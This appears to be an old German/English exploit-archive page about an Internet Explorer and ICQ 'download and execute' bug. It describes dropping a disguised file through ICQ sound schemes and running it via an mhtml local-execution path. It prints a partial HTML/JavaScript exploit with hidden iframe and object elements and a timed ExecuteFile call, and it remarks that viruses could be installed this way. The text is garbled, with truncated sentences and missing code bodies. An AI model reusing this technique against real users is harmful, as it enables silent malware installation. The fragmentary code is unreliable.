IE
BUG : Download & Execute |
| Disskussion : |
| >>Outline<<
<qoute> Well i dont know if it will destroy the world, but sure enough it's enough Actually i found the "hole" adam discovered myself a few months
back but It does infact allow you to run code of your choosing on a victims machine >>Explaination and example<< I have created an example exploit on http://www.xs4all.nl/~jkuperus/icq/icq.htm that starts a little flame program It works as followed the default action for icq soundscheme (scm) files is open it places
the wav flame.scm wil be downloaded and installed in C:\Program In reality however this is not a wav file but a mht (mail archive file)
with then i use one of the many available local code execution vulnerabilities mhtml:file:///C:/Program%20Files/ICQ/Sounds/flame/Auth.wav!file:///C:/fire.e I dont think its necisary to use one of ie's exploit as you can also
call
For a short term solution open explorer (the file manager not the browser) locate the scm extention and change the default behaviour to prompt before In the long term icq will have to use something like random foldernames
for |
| Sourcecode : |
| <html>
<head> </head> <body> <iframe src="jelmer.wsz" style="display:none"></iframe> <object id="dataObject" type="text/html" data="empty.html" style="display:none"></object> <textarea id=HtmlInput style="display:none" name="textarea">
<script language="javascript"> setTimeout("ExecuteFile()",5000); var ref = document.getElementById("dataObject").object, sFile=""; function ExecuteFile(){ function CheckFile(){ </script> </body> </html> |
| Weitere Möglichkeiten : |
Es wäre möglich
Viren so zu installieren es gibt bei kleinen Files nicht die Chance denn
Download abzubrechen , der Automatisch anfängt... nach dem Download
wird das File ausgeführt ... damit ist ziemlich viel chaos möglich
... |